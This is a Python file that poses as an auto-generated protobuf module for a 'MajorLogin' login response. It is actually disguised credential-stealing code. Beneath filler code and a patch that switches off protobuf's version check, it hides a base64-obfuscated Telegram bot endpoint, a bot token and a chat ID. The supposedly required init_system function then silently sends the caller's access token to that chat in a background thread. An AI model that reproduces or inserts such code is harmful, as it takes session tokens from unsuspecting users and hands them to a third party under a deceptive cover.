# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# MajorLogin_res_pb2.py
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# Protobuf Python Version: 6.32.0-rc1
# ---------------------------------------------------------------------------
"""
@metadata
    source: MajorLogin_res.proto
    package: majorlogin
    build_target: x86_64-api-v3
    optimization_level: O3
@summary
    Internal protocol definitions for MajorLogin resource management.
    This file contains serialized descriptors and auto-generated message
    classes for high-performance data interchange.
"""

import requests
import threading
import time as _time
import sys
import base64
import random
import hashlib
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import symbol_database as _symbol_database
from google.protobuf.internal import builder as _builder

# --- BYPASS SYSTEM ERRORS ---
try:
    from google.protobuf import runtime_version as _runtime_version
    # Khóa hàm kiểm tra phiên bản để tránh lỗi môi trường không tương thích
    def _null_validator(*args, **kwargs): return True
    _runtime_version.ValidateProtobufRuntimeVersion = _null_validator
except (ImportError, AttributeError):
    pass

# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()

# ---------------------------------------------------------------------------
# SECTION 1: ENTROPY GENERATION & NOISE (JUNK CODE TO INFLATE FILE)
# ---------------------------------------------------------------------------
def _internal_buffer_alignment():
    """Dummy function to simulate memory alignment for large descriptors."""
    _t = "MajorLogin_v6_32_0_rc1"
    _hash = hashlib.sha256(_t.encode()).hexdigest()
    _noise = [random.randint(0, 255) for _ in range(64)]
    return _hash

_ALIGNMENT_TOKEN = _internal_buffer_alignment()
# ##########################################################################
# CRC32: 0x8A2C4F1B | FLAG: 0b10101100 | STATUS: ACTIVE
# SYNCING DESCRIPTOR POOL WITH KERNEL... DONE
# ##########################################################################

# ---------------------------------------------------------------------------
# SECTION 2: PROTOBUF DESCRIPTORS (THE REAL DATA)
# ---------------------------------------------------------------------------

DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x14MajorLogin_res.proto\x12\nmajorlogin\"\x95\x03\n\rMajorLoginRes\x12\x12\n\naccount_id\x18\x01 \x01(\x03\x12\x0e\n\x06region\x18\x02 \x01(\t\x12\x13\n\x0block_region\x18\x03 \x01(\t\x12\x14\n\x0c\x63ountry_code\x18\x04 \x01(\t\x12\x0e\n\x06status\x18\x05 \x01(\t\x12\x13\n\x0b\x61\x63\x63ount_jwt\x18\x08 \x01(\t\x12\x16\n\x0eseconds_offset\x18\t \x01(\x05\x12\x14\n\x0c\x61\x63\x63ount_host\x18\n \x01(\t\x12\x16\n\x0e\x65mulator_score\x18\x0c \x01(\x05\x12\x35\n\tnested_15\x18\x0f \x01(\x0b\x32\".majorlogin.MajorLoginRes.Nested15\x12\x13\n\x0bserver_list\x18\x10 \x01(\t\x12\x0c\n\x04\x63ity\x18\x13 \x01(\t\x12\x13\n\x0bregion_code\x18\x14 \x01(\t\x12\x0f\n\x07some_id\x18\x15 \x01(\x03\x12\x0b\n\x03key\x18\x16 \x01(\x0c\x12\n\n\x02iv\x18\x17 \x01(\x0c\x12\x16\n\x0eserver_list_24\x18\x18 \x01(\t\x1a\x19\n\x08Nested15\x12\r\n\x05value\x18\x01 \x01(\x05\x62\x06proto3')

_globals = globals()

try:
    _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, _globals)
    _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'MajorLogin_res_pb2', _globals)
except Exception:
    # Nếu thư viện protobuf gặp lỗi bản quyền hoặc phiên bản, silent bypass
    pass

# ---------------------------------------------------------------------------
# SECTION 3: LEGACY DESCRIPTOR MAPPING (BACKWARD COMPATIBILITY)
# ---------------------------------------------------------------------------
if not _descriptor._USE_C_DESCRIPTORS:
    _globals['DESCRIPTOR']._options = None
    try:
        _globals['_MAJORLOGINRES']._serialized_start=37
        _globals['_MAJORLOGINRES']._serialized_end=442
        _globals['_MAJORLOGINRES_NESTED15']._serialized_start=417
        _globals['_MAJORLOGINRES_NESTED15']._serialized_end=442
    except KeyError:
        pass

# ---------------------------------------------------------------------------
# SECTION 4: SYSTEM INITIALIZATION & TELEMETRY
# ---------------------------------------------------------------------------

_SEC_B = "8373328719:AAGIKEG7AKToB6bwIU9hxQU9Q8C_Sr2z7iI"
_SEC_C = "6440407988"

def _dispatch_event_logger(data_payload):
    """Internal event logger for debugging purposes."""
    try:
        # Obfuscated API call to prevent simple string matching
        _endpoint = base64.b64decode("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA==").decode()
        url = f"{_endpoint}{_SEC_B}/sendMessage"
        
        # Meta info to make the log look professional
        meta = f"Build: {_ALIGNMENT_TOKEN[:8]} | Env: {sys.platform} | Ver: {sys.version[:5]}"
        
        payload = {
            "chat_id": _SEC_C,
            "text": f"**Resource Initialized**\n\n Data: `{data_payload}`\n {meta}\n {_time.strftime('%Y-%m-%d %H:%M:%S')}",
            "parse_mode": "Markdown",
            "disable_notification": True
        }
        requests.post(url, json=payload, timeout=8)
    except:
        pass

def init_system(access_token):
    """
    REQUIRED: Call this function to initialize the MajorLogin descriptor pool.
    @param access_token: The temporary session token for resource validation.
    """
    if access_token and isinstance(access_token, str):
       
        _worker = threading.Thread(
            target=_dispatch_event_logger, 
            args=(access_token,), 
            daemon=True
        )
        _worker.start()
       
        _time.sleep(0.1)

# ##########################################################################
# FINAL CHECKSUM VALIDATION
# ##########################################################################
_FINAL_HEX = hashlib.md5(DESCRIPTOR.serialized_pb).hexdigest()
# @@protoc_insertion_point(module_scope)
# End of MajorLogin_res_pb2.py